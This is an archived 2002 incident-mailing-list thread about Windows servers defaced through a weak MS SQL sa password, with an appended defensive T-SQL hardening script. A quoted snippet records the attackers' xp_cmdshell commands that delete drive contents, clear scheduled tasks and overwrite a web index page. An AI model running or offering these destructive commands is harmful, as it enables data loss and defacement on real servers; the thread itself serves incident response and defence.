Re: Windows Systems Defaced

From: Alphonse MacDonald (amacdonaldat_private)
Date: Tue May 14 2002 - 13:44:18 PDT

    In-Reply-To: <BKEPKKMHGCKPBIKCIBGNGEPJCAAA.zenoneat_private>
    
    Island Press was similarly defaced; it appears access 
    occurred at 5:08 on May 8th and was achieved via the MS SQL 
    server sa password. We did not have IIS running but had 
    enough files removed to require a complete rebuild. We 
    also believed all systems to have been properly patched.
    
    Were any of the other servers attacked behind a firewall 
    or were they all visible?
    
    Alphonse 
    >From: "Steve Zenone" <zenoneat_private>
    >To: <incidentsat_private>
    >Cc: <thompsonat_private>
    >Subject: RE: Windows Systems Defaced
    >Date: Thu, 2 May 2002 20:23:56 -0700
    >>Hello,
    >
    >Stephen W. Thompson wrote:
    >|> Have any of you seen similar activity? Any thoughts?
    >|
    >|Yes, we had one that matches most of your details.  These
    >|are exact matches:
    >|
    >|>  [] Damage occurred around 1600 on 5/1/2002
    >|BUT=>   (approx. 16:00 EDT for us)
    >|>  [] Win-popup message with "F---ing University of Rochester"
    >|>       -- NOTE: not all systems running IIS
    >|>  [] Admins claimed that all systems were patched correctly
    >|>  [] Most were running updated and current AV
    >
    >Thank you very much for your reply - it definitely helps!
    >
    >We have been seeing MS-SQL (1433/tcp) attacks that try 
    >and execute the following:
    >
    >-----BEGIN SNIPPET-----
    >    xp_cmdshell 'echo net send localhost F---ing University of Rochester rebooting... > rochester.bat'
    >
    >    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
    >
    >    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
    >
    >    xp_cmdshell 'echo del g:\ /f /q /s ^nul 2^>&1 >> rochester.bat'
    >
    >    xp_cmdshell 'at /delete /y'
    >
    >    xp_cmdshell 'echo if exist \inetpub\wwwroot\ type %systemroot%\rochester.html ^ e:\inetpub\wwwroot\index.html >> rochester.bat'
    >-----END SNIPPET-----
    >
    >The above commands were directed to systems that were listening on
    >port 1433/tcp and accessible from the outside. It appears that there
    >were multiple source IPs involved in this attack.
    >
    >At this time, I am not completely clear on how to protect from this
    >attack. What I've researched is that since external functions such
    >as xp_cmdshell, xp_startmail, xp_sendmail, and xp_stopmail present
    >possible security risks, it is recommended to drop such external
    >system functions.  Else, deny EXECUTE permission on them to specific
    >users/roles if dropping these procedures would break any of the SQL
    >Server. I haven't tested this - but does anyone on this list know if
    >this is a safe and effective solution?
    >
    >Regards,
    >Steve
    >
    >
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
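
Steve asks whether dropping the extended procedures, or denying EXECUTE on them, is a safe and effective control. The T-SQL below is an added example, not part of this thread and not taken from either poster's environment. It assumes SQL Server 2005 or later (the `sp_configure 'xp_cmdshell'` switch did not exist on the SQL Server 2000 instances of 2002, where DENY EXECUTE was the available control) and a sysadmin connection to the master database. It checks for the empty sa-style password that matches Alphonse's entry point, turns xp_cmdshell off, and denies the four procedures Steve names to public.

```sql
-- Added hardening/audit script for the xp_cmdshell exposure discussed in the thread.
-- Assumes SQL Server 2005 or later and a sysadmin connection; run in master.
USE master;
GO

-- 1. Find SQL logins whose password is empty (the sa entry point described above).
--    PWDCOMPARE returns 1 when the clear text matches the stored hash.
--    (On SQL Server 2000 the equivalent check was
--     SELECT name FROM master..sysxlogins WHERE password IS NULL.)
SELECT name
FROM sys.sql_logins
WHERE PWDCOMPARE('', password_hash) = 1;
GO

-- 2. Disable xp_cmdshell at the instance level. This is the supported switch
--    from SQL Server 2005 onward; it is an advanced option, so expose it first.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
GO

-- 3. Deny EXECUTE to public on the procedures named in the thread rather than
--    dropping them; a DENY is reversible and does not break anything that a
--    privileged, legitimate job still depends on. This was the only control
--    available on SQL Server 2000. The three SQL Mail procedures exist only
--    through SQL Server 2008 R2 (SQL Mail was removed in SQL Server 2012), so
--    those three statements will fail harmlessly on newer versions.
DENY EXECUTE ON xp_cmdshell TO public;
DENY EXECUTE ON xp_startmail TO public;
DENY EXECUTE ON xp_sendmail TO public;
DENY EXECUTE ON xp_stopmail TO public;
GO

-- 4. Verify: value_in_use = 0 means xp_cmdshell is disabled.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';
GO
```

One caveat a practitioner should keep in mind: members of the sysadmin role bypass DENY entirely, and a sysadmin login can simply re-enable the option with sp_configure. So once sa itself is compromised, as in both incidents in this thread, none of steps 2 to 4 stop the attacker; they only reduce what a lower-privileged login can reach. The controls that actually close the path described here are a strong sa password (step 1 finds the empty ones) and not exposing 1433/tcp to the outside, which is exactly the firewall question Alphonse raises.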
    



    This archive was generated by hypermail 2b30 : Tue May 14 2002 - 14:10:31 PDT